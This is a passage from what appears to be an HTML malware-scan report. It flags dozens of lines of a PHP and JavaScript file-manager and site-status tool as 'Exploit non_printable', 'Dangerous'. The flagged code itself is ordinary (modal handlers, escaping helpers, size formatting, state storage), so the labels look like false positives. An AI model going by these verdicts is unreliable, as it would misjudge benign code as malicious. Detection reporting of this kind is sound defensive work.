<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) { </span><span style="color: #0000BB">statusEl</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent </span><span style="color: #007700">= </span><span style="color: #DD0000">'❌ ' </span><span style="color: #007700">+ </span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">message</span><span style="color: #007700">; });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2990</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmDeleteItem</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">isDir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3016</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmRenameSelected</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3022</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmDeleteSelected</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3029</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmCopyPath</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3032</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">el</span><span style="color: #007700">.</span><span style="color: #0000BB">style</span><span style="color: #007700">.</span><span style="color: #0000BB">color</span><span style="color: #007700">=</span><span style="color: #0000BB">old</span><span style="color: #007700">; },</span><span style="color: #0000BB">1500</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3035</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmCopyContent</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3039</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'📋'</span><span style="color: #007700">; },</span><span style="color: #0000BB">2000</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3042</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmFmtSize</span><span style="color: #007700">(</span><span style="color: #0000BB">bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3044</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bytes</span><span style="color: #007700">+</span><span style="color: #DD0000">' B'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3045</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">bytes</span><span style="color: #007700">/</span><span style="color: #0000BB">1024</span><span style="color: #007700">).</span><span style="color: #0000BB">toFixed</span><span style="color: #007700">(</span><span style="color: #0000BB">1</span><span style="color: #007700">)+</span><span style="color: #DD0000">' KB'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3046</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">bytes</span><span style="color: #007700">/</span><span style="color: #0000BB">1048576</span><span style="color: #007700">).</span><span style="color: #0000BB">toFixed</span><span style="color: #007700">(</span><span style="color: #0000BB">1</span><span style="color: #007700">)+</span><span style="color: #DD0000">' MB'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">escJs</span><span style="color: #007700">(</span><span style="color: #0000BB">s</span><span style="color: #007700">) { return </span><span style="color: #0000BB">s</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/\\/</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'\\\\'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/</span><span style="color: #DD0000">'/g,"\\'"); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3049</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">escHtml</span><span style="color: #007700">(</span><span style="color: #0000BB">s</span><span style="color: #007700">) { return </span><span style="color: #0000BB">s</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/&/</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'&amp;'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/</</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'&lt;'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/>/</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'&gt;'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/</span><span style="color: #DD0000">"/g,'&quot;'); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3051</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeFM</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">viewFile</span><span style="color: #007700">(</span><span style="color: #0000BB">filepath</span><span style="color: #007700">, </span><span style="color: #0000BB">siteRoot</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3096</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeViewModal</span><span style="color: #007700">() { </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'view-modal-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">classList</span><span style="color: #007700">.</span><span style="color: #0000BB">remove</span><span style="color: #007700">(</span><span style="color: #DD0000">'active'</span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3097</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">copyFileContent</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'📋 Копировать'</span><span style="color: #007700">; },</span><span style="color: #0000BB">2000</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeViewModal</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">openModal</span><span style="color: #007700">(</span><span style="color: #0000BB">username</span><span style="color: #007700">, </span><span style="color: #0000BB">filepath</span><span style="color: #007700">, </span><span style="color: #0000BB">hashId</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeModal</span><span style="color: #007700">() { </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">classList</span><span style="color: #007700">.</span><span style="color: #0000BB">remove</span><span style="color: #007700">(</span><span style="color: #DD0000">'active'</span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3122</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">togglePw</span><span style="color: #007700">() { var </span><span style="color: #0000BB">f</span><span style="color: #007700">=</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-password'</span><span style="color: #007700">); </span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">===</span><span style="color: #DD0000">'password'</span><span style="color: #007700">?</span><span style="color: #DD0000">'text'</span><span style="color: #007700">:</span><span style="color: #DD0000">'password'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">togglePw2</span><span style="color: #007700">() { var </span><span style="color: #0000BB">f</span><span style="color: #007700">=</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-password2'</span><span style="color: #007700">); </span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">===</span><span style="color: #DD0000">'password'</span><span style="color: #007700">?</span><span style="color: #DD0000">'text'</span><span style="color: #007700">:</span><span style="color: #DD0000">'password'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3124</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">savePassword</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3155</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeModal</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$out</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_site_states</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_storage_base_dir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 324</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">site_states_migrate</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 326</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_site_states</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$written </span><span style="color: #007700">!== </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">UP_TO_WP_STORAGE_DIR</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 340</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_touch_entry</span><span style="color: #007700">(&</span><span style="color: #0000BB">$states</span><span style="color: #007700">, </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">merge_site_saved_state</span><span style="color: #007700">(&</span><span style="color: #0000BB">$site</span><span style="color: #007700">, </span><span style="color: #0000BB">$states</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 369</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_file_path</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 379</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_allowed</span><span style="color: #007700">(</span><span style="color: #0000BB">$status</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 380</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$status</span><span style="color: #007700">, array(</span><span style="color: #DD0000">'pending'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ok'</span><span style="color: #007700">, </span><span style="color: #DD0000">'off'</span><span style="color: #007700">, </span><span style="color: #DD0000">'unknown'</span><span style="color: #007700">), </span><span style="color: #0000BB">true</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 382</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_storage_key</span><span style="color: #007700">(</span><span style="color: #0000BB">$site</span><span style="color: #007700">, </span><span style="color: #0000BB">$name_counts </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 387</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">'::' </span><span style="color: #007700">. </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$norm</span><span style="color: #007700">), </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">8</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 389</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 391</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_site_statuses</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 394</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">site_statuses_migrate_from_legacy_state</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dir</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 401</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$data</span><span style="color: #007700">[</span><span style="color: #DD0000">'sites'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 403</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 405</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_site_statuses_map</span><span style="color: #007700">(</span><span style="color: #0000BB">$sites_map</span><span style="color: #007700">) {</span>
</span>
